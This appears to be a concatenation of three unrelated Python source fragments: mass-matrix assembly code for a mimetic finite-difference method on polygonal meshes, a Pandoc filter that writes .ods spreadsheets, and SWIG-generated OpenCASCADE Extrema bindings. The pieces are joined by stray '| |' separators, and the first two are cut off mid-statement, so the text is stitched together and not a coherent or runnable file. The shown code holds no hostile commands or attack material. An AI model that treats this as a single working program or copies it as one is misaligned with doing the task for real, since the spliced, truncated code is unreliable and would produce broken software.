#The last vertex,edge will be the first. This is in order to complete the loop.
N = len(Element)
OrientedEdges = [0]*(N+1)
OrientedVertices = [0]*(N+1)
for i in range(N):
if Ori[i]==1:
OrientedEdges[i] = EdgeNodes[Element[i]] #If they are "well-oriented" then do not alter them
else:
[v1,v2] = EdgeNodes[Element[i]] #Otherwise reverse the order of their vertices
OrientedEdges[i] = [v2,v1]
OrientedVertices[i] = Nodes[OrientedEdges[i][0]]
OrientedEdges[N] = OrientedEdges[0]
OrientedVertices[N] = OrientedVertices[0]
return OrientedVertices,OrientedEdges
def Centroid(Element,EdgeNodes,Nodes,Ori):
#This function, when provided with an element, will return its centroid or barycenter.
N = len(Element)
Cx = 0
Cy = 0
A = 0
Vertices,Edges = StandardElement(Element,EdgeNodes,Nodes,Ori)
for i in range(N):
xi = Vertices[i][0]
yi = Vertices[i][1]
xiplusone = Vertices[i+1][0]
yiplusone = Vertices[i+1][1]
Cx = Cx+(xi+xiplusone)*(xi*yiplusone-xiplusone*yi) #This formula is in Wikipedia
Cy = Cy+(yi+yiplusone)*(xi*yiplusone-xiplusone*yi)
A = A+xi*yiplusone-xiplusone*yi
A = 0.5*A
Cx = Cx/(6*A)
Cy = Cy/(6*A)
return Cx,Cy,A,Vertices,Edges
def InternalObjects(Boundary,Objects):
#provided a set of geometrical objects, say vertices or edges, this routine returns those that
#are internal.
N=len(Objects)
Internal=np.sort(np.array(list(set(np.arange(N))-set(Boundary))))
NumberInternal=len(Internal)
return Internal,NumberInternal
#Assembly
def LocprojE(Func,Element,EdgeNodes,Nodes):
#This function will, provided a function a set of nodes and edges, compute the
#projection onto the space of edge-based functions. The direction of the unit normal
#will be assumed to be the clockwise rotation of the tangential vector.
N=len(Element)
proj=np.zeros((N,1))
j = 0
for i in Element:
x1=Nodes[EdgeNodes[i][0]][0]
y1=Nodes[EdgeNodes[i][0]][1]
x2=Nodes[EdgeNodes[i][1]][0]
y2=Nodes[EdgeNodes[i][1]][1]
lengthe=math.sqrt((x2-x1)**2+(y2-y1)**2)
xmid=0.5*(x1+x2)
ymid=0.5*(y1+y2)
etimesnormal=[y2-y1,x1-x2]
Fx,Fy=Func(xmid,ymid)
proj[j]=(etimesnormal[0]*Fx+etimesnormal[1]*Fy)*lengthe**-1 #midpoint rule
j = j+1
return proj
def LocalMassMatrix(N,R,n,A,nu):
#Given the matrices N,R as defined in Ch.4 of MFD book and the dimension
#of the reconstruction space this function assembles the local mass matrix
#The formula is M=M0+M1 where M0=R(N^T R)^-1R^T and M1=lamb*DD^T where the
#columns of D span the null-space of N^T and lamb=2*trace(M0)/n
#n is the dimension of the reconstruction space
#nu is the average, over the element, of the diffusion coefficient
#A is the area of the element
#These commands compute M0
M0=np.matmul(np.transpose(N),R)
M0=np.linalg.inv(M0)
M0=np.matmul(R,M0)
M0=np.matmul(M0,np.transpose(R))
#These commands compute M1
#V=Matrix(np.transpose(N)).nullspace()
#n=len(V)
#k=len(M0[:,0])
#D=np.zeros((k,n))
#for i in range(n):
# for j in range(k):
# D[j,i]=V[i][j]
#M1=np.matmul(D,np.transpose(D))
#lamb=np.trace(M0)*2/n
#M1=lamb*M1
M1=np.linalg.inv(np.transpose(N).dot(N))
M1=np.identity(n)-N.dot(M1).dot(np.transpose(N))
gamma=np.trace(R.dot(np.transpose(R)))/(n*A*nu)
#And finally we put the two matrices together
return M0+M1*gamma
#The following three functions are necessary for the construction of the
#mass matrix in the nodal space.
def m1(x,y,xP,yP):
return 1
def m2(x,y,xP,yP):
return x-xP
def m3(x,y,xP,yP):
return y-yP
def P0(ElNodes,func,xP,yP):
po = 0
for node in ElNodes:
x = node[0]
y = node[1]
po = po+func(x,y,xP,yP)
return po/len(ElNodes)
def NewLocalMEWEMVWV(J,Basis,Element,EdgeNodes,Nodes,Ori):
#This routine will compute the local mass matrix in the edge-based space E
#Here we must ensure that the orientation of the elements is such that
#We have an orientation for the edges that respects stoke's theorem
n = len(Element)
Dim = len(Basis)
xP,yP,A,Vertices,Edges = Centroid(Element,EdgeNodes,Nodes,Ori)
nu = DiffusionCoeff(xP,yP)
NE = np.zeros((n,2))
RE = np.zeros((n,2))
for i in range(n):
x1 = Vertices[i][0]
y1 = Vertices[i][1]
x2 = Vertices[i+1][0]
y2 = Vertices[i+1][1]
lengthEdge = math.sqrt((x2-x1)**2+(y2-y1)**2)
NE[i][0] = (y2-y1)*Ori[i]*lengthEdge**-1
NE[i][1] = (x1-x2)*Ori[i]*lengthEdge**-1
RE[i][0] = (0.5*(x1+x2)-xP)*Ori[i]*lengthEdge #These formulas are derived in the tex-document
RE[i][1] = (0.5*(y1+y2)-yP)*Ori[i]*lengthEdge
ME = LocalMassMatrix(NE,RE,n,A,1)
#WE=LocalMassMatrix(RE,NE,n,A,1)
#########################
#Here we will construct the local nodal mass matrix
OrVert,OrEdg = StandardElement(Element,EdgeNodes,Nodes,Ori)
ElNodes = OrVert[0:n]
ElEdges = OrEdg[0:n]
G = np.zeros((3,3))
G[0,0] = 1
G[0,1] = P0(ElNodes,m2,xP,yP)
G[1,1] = A
G[0,2] = P0(ElNodes,m3,xP,yP)
G[2,2] = A
B = np.ones((3,n))/n
H = np.zeros((3,3))
H[0,0] = A
for i in range(n):
x1 = Vertices[i][0]
y1 = Vertices[i][1]
x2 = Vertices[i+1][0]
y2 = Vertices[i+1][1]
lengthedge = math.sqrt((x2-x1)**2+(y2-y1)**2)
taux = (x2-x1)/lengthedge
tauy = (y2-y1)/lengthedge
B[1,i] = 0.5*lengthedge*tauy
B[2,i] = -0.5*lengthedge*taux
h = lengthedge/3
nx = tauy
ny = -taux
costheta = (x2-x1)/lengthedge
sintheta = (y2-y1)/lengthedge
xot = x1+h*costheta
yot = y1+h*sintheta
xtt = x1+2*h*costheta
ytt = y1+2*h*sintheta
H[1,1] = H[1,1] + h*nx*( m2(x1,y1,xP,yP)**3+\
3*m2(xot,yot,xP,yP)**3+\
3*m2(xtt,ytt,xP,yP)**3+\
m2(x2,y2,xP,yP)**3 )/8
H[2,2] = H[2,2] + h*nx*( m3(x1,y1,xP,yP)**3+\
3*m3(xot,yot,xP,yP)**3+\
3*m3(xtt,ytt,xP,yP)**3+\
m3(x2,y2,xP,yP)**3 )/8
H[1,2] = H[1,2] + 3*h*nx*( m3(x1,y1,xP,yP)*m2(x1,y1,xP,yP)**2+\
3*m3(xot,yot,xP,yP)*m2(xot,yot,xP,yP)**2+\
3*m3(xtt,ytt,xP,yP)*m2(xtt,ytt,xP,yP)**2+\
m3(x2,y2,xP,yP)*m2(x2,y2,xP,yP)**2 )/16
H[2,1] = H[2,1] + 3*h*nx*( m3(x1,y1,xP,yP)*m2(x1,y1,xP,yP)**2+\
3*m3(xot,yot,xP,yP)*m2(xot,yot,xP,yP)**2+\
3*m3(xtt,ytt,xP,yP)*m2(xtt,ytt,xP,yP)**2+\
m3(x2,y2,xP,yP)*m2(x2,y2,xP,yP)**2 )/16
D = np.ones((n,3))
D[:,1] = [m2(x,y,xP,yP) for [x,y] in ElNodes]
D[:,2] = [m3(x,y,xP,yP) for [x,y] in ElNodes]
Pistar = np.linalg.inv(G).dot(B)
Pi = D.dot(Pistar)
Id = np.identity(n)
MV = np.transpose(Pistar).dot(H.dot(Pistar))+A*np.transpose(Id-Pi).dot(Id-Pi)
NJ = np.zeros((Dim,n))
for i in range(Dim):
NJ[i,:] = np.transpose( LocprojE(Basis[i],Element,EdgeNodes,Nodes) )
NJ = np.transpose(NJ)
#print(NJ)
b = np.transpose(NJ).dot(ME)
#print(b)
#print(ME)
#print(NJ)
#print(np.transpose(NJ).dot(ME).dot(NJ))
#print(np.linalg.inv( np.transpose(NJ).dot(ME).dot(NJ) ) )
MJ = np.linalg.pinv( np.transpose(NJ).dot(ME).dot(NJ) )
#print(MJ)
MJ = MJ.dot(b)
#print(MJ)
PolyCoordinates = np.zeros((2*(len(Vertices)-1),Dim))
JMatrix = np.zeros( (len(Vertices)-1,2*(len(Vertices)-1)) )
l = 0
k = 0
for Polynomial in Basis:
for j in range(len(Vertices)-1):
Vertex = Vertices[j]
x = Vertex[0]
y = Vertex[1]
Px,Py = Polynomial(x,y)
PolyCoordinates[2*j,l] = Px
PolyCoordinates[2*j+1,l] = Py
if k==0:
Jx,Jy = J(x,y)
JMatrix[j,2*j] = -Jy
JMatrix[j,2*j+1] = Jx
j = j+1
k = 1
l = l+1
MJ = JMatrix.dot(PolyCoordinates).dot(MJ)
MJ = MV.dot(MJ)
return ME,MV,MJ,Edges
def LeastSquaresLocalMEWEMVWV(J,Basis,Element,EdgeNodes,Nodes,Ori):
#This routine will compute the local mass matrix in the edge-based space E
#Here we must ensure that the orientation of the elements is such that
#We have an orientation for the edges that respects stoke's theorem
n = len(Element)
Dim = len(Basis)
xP,yP,A,Vertices,Edges = Centroid(Element,EdgeNodes,Nodes,Ori)
nu = DiffusionCoeff(xP,yP)
NE = np.zeros((n,2))
RE = np.zeros((n,2))
for i in range(n):
x1 = Vertices[i][0]
y1 = Vertices[i][1]
x2 = Vertices[i+1][0]
y2 = Vertices[i+1][1]
lengthEdge = math.sqrt((x2-x1)**2+(y2-y1)**2)
NE[i][0] = (y2-y1)*Ori[i]*lengthEdge**-1
NE[i][1] = (x1-x2)*Ori[i]*lengthEdge**-1
RE[i][0] = (0.5*(x1+x2)-xP)*Ori[i]*lengthEdge #These formulas are derived in the tex-document
RE[i][1] = (0.5*(y1+y2)-yP)*Ori[i]*lengthEdge
ME = LocalMassMatrix(NE,RE,n,A,1)
#WE=LocalMassMatrix(RE,NE,n,A,1)
#########################
#Here we will construct the local nodal mass matrix
OrVert,OrEdg = StandardElement(Element,EdgeNodes,Nodes,Ori)
ElNodes = OrVert[0:n]
ElEdges = OrEdg[0:n]
H = np.zeros((3,3))
H[0,0] = A
for i in range(n):
x1 = Vertices[i][0]
y1 = Vertices[i][1]
x2 = Vertices[i+1][0]
y2 = Vertices[i+1][1]
lengthedge = math.sqrt((x2-x1)**2+(y2-y1)**2)
taux = (x2-x1)/lengthedge
tauy = (y2-y1)/lengthedge
h = lengthedge/3
nx = tauy
ny = -taux
costheta = (x2-x1)/lengthedge
sintheta = (y2-y1)/lengthedge
xot = x1+h*costheta
yot = y1+h*sintheta
xtt = x1+2*h*costheta
ytt = y1+2*h*sintheta
H[1,1] = H[1,1] + h*nx*( m2(x1,y1,xP,yP)**3+\
3*m2(xot,yot,xP,yP)**3+\
3*m2(xtt,ytt,xP,yP)**3+\
m2(x2,y2,xP,yP)**3 )/8
H[2,2] = H[2,2] + h*nx*( m3(x1,y1,xP,yP)**3+\
3*m3(xot,yot,xP,yP)**3+\
3*m3(xtt,ytt,xP,yP)**3+\
m3(x2,y2,xP,yP)**3 )/8
H[1,2] = H[1,2] + 3*h*nx*( m3(x1,y1,xP,yP)*m2(x1,y1,xP,yP)**2+\
3*m3(xot,yot,xP,yP)*m2(xot,yot,xP,yP)**2+\
3*m3(xtt,ytt,xP,yP)*m2(xtt,ytt,xP,yP)**2+\
m3(x2,y2,xP,yP)*m2(x2,y2,xP,yP)**2 )/16
H[2,1] = H[2,1] + 3*h*nx*( m3(x1,y1,xP,yP)*m2(x1,y1,xP,yP)**2+\
3*m3(xot,yot,xP,yP)*m2(xot,yot,xP,yP)**2+\
3*m3(xtt,ytt,xP,yP)*m2(xtt,ytt,xP,yP)**2+\
m3(x2,y2,xP,yP)*m2(x2,y2,xP,yP)**2 )/16
D = np.ones((n,3))
D[:,1] = [m2(x,y,xP,yP) for [x,y] in ElNodes]
D[:,2] = [m3(x,y,xP,yP) for [x,y] in ElNodes]
Pistar = np.linalg.inv(np.transpose(D).dot(D)).dot(np.transpose(D))
Pi = D.dot(Pistar)
Id = np.identity(n)
MV = np.transpose(Pistar).dot(H.dot(Pistar))+A*np.transpose(Id-Pi).dot(Id-Pi)
NJ = np.zeros((Dim,n))
for i in range(Dim):
NJ[i,:] = np.transpose( LocprojE(Basis[i],Element,EdgeNodes,Nodes) )
NJ = np.transpose(NJ)
#print(NJ)
b = np.transpose(NJ).dot(ME)
#print(b)
#print(ME)
#print(NJ)
#print(np.transpose(NJ).dot(ME).dot(NJ))
#print(np.linalg.inv( np.transpose(NJ).dot(ME).dot(NJ) ) )
MJ = np.linalg.pinv( np.transpose(NJ).dot(ME).dot(NJ) )
#print(MJ)
MJ = MJ.dot(b)
#print(MJ)
PolyCoordinates = np.zeros((2*(len(Vertices)-1),Dim))
JMatrix = np.zeros( (len(Vertices)-1,2*(len(Vertices)-1)) )
l = 0
k = 0
for Polynomial in Basis:
for j in range(len(Vertices)-1):
Vertex = Vertices[j]
x = Vertex[0]
y = Vertex[1]
Px,Py = Polynomial(x,y)
PolyCoordinates[2*j,l] = Px
PolyCoordinates[2*j+1,l] = Py
if k==0:
Jx,Jy = J(x,y)
JMatrix[j,2*j] = -Jy
JMatrix[j,2*j+1] = Jx
j = j+1
k = 1
l = l+1
MJ = JMatrix.dot(PolyCoordinates).dot(MJ)
MJ = MV.dot(MJ)
return ME,MV,MJ,Edges
def psi3(x,y):
return 1-x-y
def psi2(x,y):
return y
def psi1(x,y):
return x
def PieceWiseLocalMEWEMVWV(J,Basis,Element,EdgeNodes,Nodes,Ori):
#This routine will compute the local mass matrix in the edge-based space E
#Here we must ensure that the orientation of the elements is such that
#We have an orientation for the edges that respects stoke's theorem
n = len(Element)
Dim = len(Basis)
xP,yP,A,Vertices,Edges = Centroid(Element,EdgeNodes,Nodes,Ori)
nu = DiffusionCoeff(xP,yP)
NE = np.zeros((n,2))
RE = np.zeros((n,2))
for i in | |
#!/usr/bin/env python3
import argparse
import json
import sys
from subprocess import Popen, PIPE
from odf.draw import Image, Frame
from odf.opendocument import OpenDocumentSpreadsheet
from odf.style import Style, TableColumnProperties, TableRowProperties, TextProperties
from odf.table import Table, TableRow, TableCell, TableColumn
from odf.text import P, A
from pandocodswriter.limages import load_images
from pandocodswriter.lstyle import load_style, add_fmt, st_dict
# usage - python odswriter.py yourInputFile.yourExetention yourOutputFile.ods -s *YOUR POSITIVE NUMBER*
# check README.md for more information.
# DO NOT mix up places of intput and output.
# Style names.
# header0 - just for correct index.
# If in input file more, than two levels of headers, next level header will generate automatically
# with name = "header" + str(level).
header = ['header0', 'header1', 'header2']
table_header = 'tablehead'
table_content = 'tablebody'
simple_text = 'text'
# Read the command-line arguments.
parser = argparse.ArgumentParser(description='Pandoc ODS writer. This is Pandoc filter, but there is no opportunity '
'write .ods files easier way. So, use "out.ods" '
'option to write .ods files with this filter')
parser.add_argument('input', help='Input file. Use Pandoc`s input formats.', action='store')
parser.add_argument('output', help='Output file. Use .ods filename extension.', action='store')
parser.add_argument('-s', '--separator', nargs=1, help='Header level to separate sheets, 0 by default(no separation).',
action='store')
parser.add_argument('-r', '--reference', nargs=1, help='Reference to file with styles', action='store')
args = parser.parse_args()
# It is important for auto-height in text-rows:
# if you want to change width by default (10 cm), change it in 'write_sheet()',
# count how much PT in your length (in CM) and change this constant:
PTINTENCM = 284
# count how much IN in your length (in CM) and change this constant:
ININTENCM = 3.9
# I need this global variables, because there are two recursive functions call each other, so it would be very hard work
# without global "string_to_write". Other ones are just make those functions much more easy to read.
ods = OpenDocumentSpreadsheet()
table = Table() # creating the first sheet
content = P()
string_to_write = ''
header_level = 0
bullet = 0 # indicating bullet lists
ordered = 0 # indicating bullet list and used as order at item lines
image_counter = 0
saved_hr = None # list of hardreferences to loaded images
saved_styles = {} # We will save styles in order to not downloading it again each time we use it.
separator = 0 # level of separating header
# Dictionary of formatting indicators.
fmt = {'Emph': 0,
'Strong': 0,
'Strikeout': 0}
def write_sheet():
wide = Style(name="Wide", family="table-column")
wide.addElement(TableColumnProperties(columnwidth="10cm"))
ods.automaticstyles.addElement(wide)
table.addElement(TableColumn(stylename='Wide'))
ods.spreadsheet.addElement(table)
def count_height(row, cell):
"""Counting height that shows all text in cell.
This functions uses width of text-column and font size.
Args:
row - current row.
cell - current cell.
"""
style_name = cell.getAttribute('stylename')
try:
style = saved_styles[style_name]
text_prop = style.getElementsByType(TextProperties)
try:
text_prop = text_prop[0]
font_size = str(text_prop.getAttribute('fontsize'))
font_size = font_size.replace('pt', '')
font_size = int(font_size)
except IndexError:
font_size = 10
except KeyError:
font_size = 10
symbols_in_string = PTINTENCM // font_size + 1
length = 0
for p in cell.getElementsByType(P):
length += len(p.__str__())
height = font_size*(length // symbols_in_string + 1) + 4
height = str(height) + 'pt'
new_name = 'heightsuit' + height
height_suit = Style(name=new_name, family='table-row')
height_suit.addElement(TableRowProperties(rowheight=height))
ods.automaticstyles.addElement(height_suit)
row.setAttribute(attr='stylename', value=new_name)
def count_size(wh_list, row):
"""Count height of image row.
Args:
wh_list - list with attributes, contains width and height:
row - image row.
"""
height, width = -1, -1
for l in wh_list:
if l[0] == 'width':
width = float(l[1].replace('in', ''))
if l[0] == 'height':
height = float(l[1].replace('in', ''))
if height == -1 or width == -1:
width = ININTENCM
height = ININTENCM
if width > ININTENCM:
new_width = ININTENCM
new_height = height * new_width / width
else:
new_width = width
new_height = height
height_set = str(new_height)+'in'
new_name = 'image' + str(image_counter)
height_suit = Style(name=new_name, family='table-row')
height_suit.addElement(TableRowProperties(rowheight=height_set))
ods.automaticstyles.addElement(height_suit)
row.setAttribute(attr='stylename', value=new_name)
new_width = str(new_width) + 'in'
new_height = height_set
return new_width, new_height
def add_style(cell, name):
"""Add style to cell element.
This function calls style loading from 'lstyle' and saves it, in order to use it again quickly.
Args:
cell - cell that needs to be styled.
name - style name that will be set.
"""
if args.reference:
styles_source = args.reference[0]
else:
styles_source = str(sys.argv[0])
styles_source = styles_source.replace('odswriter.py', '')
styles_source = styles_source + 'styles.ods'
global saved_styles
global ods
try:
saved_styles[name]
except KeyError:
style = load_style(name, styles_source)
if style is not None:
saved_styles[name] = style
ods.styles.addElement(style)
cell.setAttribute(attr='stylename', value=name)
def write_text():
"""Write to output file ordinary elements.
This function is called every tame, we collect whole paragraph or block of elements in 'string_to_write'
We write every block or paragraph in it's own cell in the first column of output file.
After writing we shift down current row and clean 'string_to_write' in order to collect next elements.
"""
global string_to_write
global header_level
global ordered
global bullet
global table
global separator
global content
row = TableRow()
cell = TableCell()
if header_level != 0 and header_level > 0:
if header_level > (len(header) - 1): # if there are headers with lvl bigger than 2
for i in range(len(header), header_level+1): # creating names for headers with lvl bigger than 2
header.append('header' + str(i))
add_style(cell, header[header_level])
if header_level == separator: # if separator was set, we will create new sheet in document
if table.hasChildNodes():
write_sheet()
table = Table(name=string_to_write) # creating new sheet with separating header as name
else:
add_style(cell, simple_text)
if bullet:
string_to_write = '- ' + string_to_write
if ordered > 0:
string_to_write = str(ordered) + ') ' + string_to_write
ordered = ordered + 1
content.addText(string_to_write)
cell.addElement(content)
content = P()
count_height(row, cell)
row.addElement(cell)
table.addElement(row)
string_to_write = ''
def write_image(image):
"""Write to output file image elements.
Since, element with title 'Image' has special structure of 'c'(Content) field, that looks like:
[[0], [1], [2]]
where:
[0] - list of attributes: identifier, classes, key-value pairs:
['id', [], [ ... , ['weight', '...in'], ['height', '...in'], ... ] - we get sizes there.
[1] - caption.
[2] - ['src', 'title'] - source and title of image.
we should parse it especially.
Args:
image - element with title 'Image'.
"""
global image_counter
global saved_hr
if image_counter == -1:
return
if image_counter == 0:
saved_hr = load_images(args.input, ods)
if len(saved_hr) == 0:
image_counter = -1
return
if string_to_write:
write_text()
row = TableRow()
cell = TableCell()
w, h = count_size(image['c'][0][2], row)
frame = Frame(width=w, height=h)
img = Image(href=saved_hr[image_counter])
table.addElement(row)
row.addElement(cell)
cell.addElement(frame)
frame.addElement(img)
image_counter = image_counter + 1
def write_bullet(bull_list, without_write):
global bullet
bullet = 1
list_parse(bull_list['c'], without_write)
bullet = 0
def write_ord(ord_list, without_write):
global ordered
ordered = 1
list_parse(ord_list['c'], without_write)
ordered = 0
def write_code(code):
"""Write to output file code elements.
Since, element with title 'Code' or 'CodeBlock' has special structure of 'c'(Content) field, that looks like:
[[0], 'code']
where:
[0] - list of attributes: identifier, classes, key-value pairs.
'code' - string with code.
we should parse it especially.
Args:
code - element with title 'Code' or 'CodeBlock'.
"""
global string_to_write
string_to_write = string_to_write + code['c'][1]
def write_link(link):
"""Write special blocks with attributes.
Since, element with title 'Link' has special structure of 'c'(Content) field, that looks like:
[[atr], [1},['target', 'title']]
where:
[atr] - list of attributes: identifier, classes, key-value pairs.
[1] - list with objects (list of dictionaries) - visible text of hyperlink.
['target', 'title'] - list with two strings, 'target' - URL, 'title' - title.
we should parse it especially.
Args:
link - element with title 'Link'.
"""
global string_to_write
global content
content.addText(string_to_write)
string_to_write = ''
list_parse(link['c'][1], without_write=True)
a = A(href=link['c'][2][0], text=string_to_write)
string_to_write = ''
content.addElement(a)
def write_math(math):
"""Write to output file code elements
Since, element with title 'Math' has special structure of 'c'(Content) field, that looks like:
[{0}, 'math'].
where:
{0} - dictionary contains type of math.
'math' - string with math.
we should parse it especially.
TeX Math format.
Args:
raw - element with title 'Math'.
"""
# TODO: write it
global string_to_write
string_to_write = string_to_write + math['c'][1]
def write_raw(raw):
"""Write to output file raw elements.
Since, element with title 'RawBlock' or 'RawInline' has special structure of 'c'(Content) field, that looks like:
[format, 'raw text']
where:
format - format of raw text.
'raw text' - string with raw text.
we should parse it especially.
Args:
raw - element with title 'RawBlock' or 'RawInline'.
"""
global string_to_write
string_to_write = string_to_write + raw['c'][1]
def write_special_block(block, without_write):
"""Write special | |
lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_Extrema.Handle_Extrema_LCCacheOfLocateExtCC_swiginit(self,_Extrema.new_Handle_Extrema_LCCacheOfLocateExtCC(*args))
# register the handle in the base object
if len(args) > 0:
register_handle(self, args[0])
DownCast = staticmethod(_Extrema.Handle_Extrema_LCCacheOfLocateExtCC_DownCast)
__swig_destroy__ = _Extrema.delete_Handle_Extrema_LCCacheOfLocateExtCC
Handle_Extrema_LCCacheOfLocateExtCC.Nullify = new_instancemethod(_Extrema.Handle_Extrema_LCCacheOfLocateExtCC_Nullify,None,Handle_Extrema_LCCacheOfLocateExtCC)
Handle_Extrema_LCCacheOfLocateExtCC.IsNull = new_instancemethod(_Extrema.Handle_Extrema_LCCacheOfLocateExtCC_IsNull,None,Handle_Extrema_LCCacheOfLocateExtCC)
Handle_Extrema_LCCacheOfLocateExtCC.GetObject = new_instancemethod(_Extrema.Handle_Extrema_LCCacheOfLocateExtCC_GetObject,None,Handle_Extrema_LCCacheOfLocateExtCC)
Handle_Extrema_LCCacheOfLocateExtCC_swigregister = _Extrema.Handle_Extrema_LCCacheOfLocateExtCC_swigregister
Handle_Extrema_LCCacheOfLocateExtCC_swigregister(Handle_Extrema_LCCacheOfLocateExtCC)
def Handle_Extrema_LCCacheOfLocateExtCC_DownCast(*args):
return _Extrema.Handle_Extrema_LCCacheOfLocateExtCC_DownCast(*args)
Handle_Extrema_LCCacheOfLocateExtCC_DownCast = _Extrema.Handle_Extrema_LCCacheOfLocateExtCC_DownCast
class Extrema_LocECC2dOfLocateExtCC2d(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:param C1:
:type C1: Adaptor2d_Curve2d &
:param C2:
:type C2: Adaptor2d_Curve2d &
:param U0:
:type U0: float
:param V0:
:type V0: float
:param TolU:
:type TolU: float
:param TolV:
:type TolV: float
:rtype: None
"""
_Extrema.Extrema_LocECC2dOfLocateExtCC2d_swiginit(self,_Extrema.new_Extrema_LocECC2dOfLocateExtCC2d(*args))
def IsDone(self, *args):
"""
:rtype: bool
"""
return _Extrema.Extrema_LocECC2dOfLocateExtCC2d_IsDone(self, *args)
def SquareDistance(self, *args):
"""
:rtype: float
"""
return _Extrema.Extrema_LocECC2dOfLocateExtCC2d_SquareDistance(self, *args)
def Point(self, *args):
"""
:param P1:
:type P1: Extrema_POnCurv2d &
:param P2:
:type P2: Extrema_POnCurv2d &
:rtype: None
"""
return _Extrema.Extrema_LocECC2dOfLocateExtCC2d_Point(self, *args)
__swig_destroy__ = _Extrema.delete_Extrema_LocECC2dOfLocateExtCC2d
Extrema_LocECC2dOfLocateExtCC2d.IsDone = new_instancemethod(_Extrema.Extrema_LocECC2dOfLocateExtCC2d_IsDone,None,Extrema_LocECC2dOfLocateExtCC2d)
Extrema_LocECC2dOfLocateExtCC2d.SquareDistance = new_instancemethod(_Extrema.Extrema_LocECC2dOfLocateExtCC2d_SquareDistance,None,Extrema_LocECC2dOfLocateExtCC2d)
Extrema_LocECC2dOfLocateExtCC2d.Point = new_instancemethod(_Extrema.Extrema_LocECC2dOfLocateExtCC2d_Point,None,Extrema_LocECC2dOfLocateExtCC2d)
Extrema_LocECC2dOfLocateExtCC2d_swigregister = _Extrema.Extrema_LocECC2dOfLocateExtCC2d_swigregister
Extrema_LocECC2dOfLocateExtCC2d_swigregister(Extrema_LocECC2dOfLocateExtCC2d)
class Extrema_LocECCOfLocateExtCC(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:param C1:
:type C1: Adaptor3d_Curve &
:param C2:
:type C2: Adaptor3d_Curve &
:param U0:
:type U0: float
:param V0:
:type V0: float
:param TolU:
:type TolU: float
:param TolV:
:type TolV: float
:rtype: None
"""
_Extrema.Extrema_LocECCOfLocateExtCC_swiginit(self,_Extrema.new_Extrema_LocECCOfLocateExtCC(*args))
def IsDone(self, *args):
"""
:rtype: bool
"""
return _Extrema.Extrema_LocECCOfLocateExtCC_IsDone(self, *args)
def SquareDistance(self, *args):
"""
:rtype: float
"""
return _Extrema.Extrema_LocECCOfLocateExtCC_SquareDistance(self, *args)
def Point(self, *args):
"""
:param P1:
:type P1: Extrema_POnCurv &
:param P2:
:type P2: Extrema_POnCurv &
:rtype: None
"""
return _Extrema.Extrema_LocECCOfLocateExtCC_Point(self, *args)
__swig_destroy__ = _Extrema.delete_Extrema_LocECCOfLocateExtCC
Extrema_LocECCOfLocateExtCC.IsDone = new_instancemethod(_Extrema.Extrema_LocECCOfLocateExtCC_IsDone,None,Extrema_LocECCOfLocateExtCC)
Extrema_LocECCOfLocateExtCC.SquareDistance = new_instancemethod(_Extrema.Extrema_LocECCOfLocateExtCC_SquareDistance,None,Extrema_LocECCOfLocateExtCC)
Extrema_LocECCOfLocateExtCC.Point = new_instancemethod(_Extrema.Extrema_LocECCOfLocateExtCC_Point,None,Extrema_LocECCOfLocateExtCC)
Extrema_LocECCOfLocateExtCC_swigregister = _Extrema.Extrema_LocECCOfLocateExtCC_swigregister
Extrema_LocECCOfLocateExtCC_swigregister(Extrema_LocECCOfLocateExtCC)
class Extrema_LocEPCOfLocateExtPC(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
:param P:
:type P: gp_Pnt
:param C:
:type C: Adaptor3d_Curve &
:param U0:
:type U0: float
:param TolU:
:type TolU: float
:rtype: None
:param P:
:type P: gp_Pnt
:param C:
:type C: Adaptor3d_Curve &
:param U0:
:type U0: float
:param Umin:
:type Umin: float
:param Usup:
:type Usup: float
:param TolU:
:type TolU: float
:rtype: None
"""
_Extrema.Extrema_LocEPCOfLocateExtPC_swiginit(self,_Extrema.new_Extrema_LocEPCOfLocateExtPC(*args))
def Initialize(self, *args):
"""
:param C:
:type C: Adaptor3d_Curve &
:param Umin:
:type Umin: float
:param Usup:
:type Usup: float
:param TolU:
:type TolU: float
:rtype: None
"""
return _Extrema.Extrema_LocEPCOfLocateExtPC_Initialize(self, *args)
def Perform(self, *args):
"""
:param P:
:type P: gp_Pnt
:param U0:
:type U0: float
:rtype: None
"""
return _Extrema.Extrema_LocEPCOfLocateExtPC_Perform(self, *args)
def IsDone(self, *args):
"""
:rtype: bool
"""
return _Extrema.Extrema_LocEPCOfLocateExtPC_IsDone(self, *args)
def SquareDistance(self, *args):
"""
:rtype: float
"""
return _Extrema.Extrema_LocEPCOfLocateExtPC_SquareDistance(self, *args)
def IsMin(self, *args):
"""
:rtype: bool
"""
return _Extrema.Extrema_LocEPCOfLocateExtPC_IsMin(self, *args)
def Point(self, *args):
"""
:rtype: Extrema_POnCurv
"""
return _Extrema.Extrema_LocEPCOfLocateExtPC_Point(self, *args)
__swig_destroy__ = _Extrema.delete_Extrema_LocEPCOfLocateExtPC
Extrema_LocEPCOfLocateExtPC.Initialize = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC_Initialize,None,Extrema_LocEPCOfLocateExtPC)
Extrema_LocEPCOfLocateExtPC.Perform = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC_Perform,None,Extrema_LocEPCOfLocateExtPC)
Extrema_LocEPCOfLocateExtPC.IsDone = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC_IsDone,None,Extrema_LocEPCOfLocateExtPC)
Extrema_LocEPCOfLocateExtPC.SquareDistance = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC_SquareDistance,None,Extrema_LocEPCOfLocateExtPC)
Extrema_LocEPCOfLocateExtPC.IsMin = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC_IsMin,None,Extrema_LocEPCOfLocateExtPC)
Extrema_LocEPCOfLocateExtPC.Point = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC_Point,None,Extrema_LocEPCOfLocateExtPC)
Extrema_LocEPCOfLocateExtPC_swigregister = _Extrema.Extrema_LocEPCOfLocateExtPC_swigregister
Extrema_LocEPCOfLocateExtPC_swigregister(Extrema_LocEPCOfLocateExtPC)
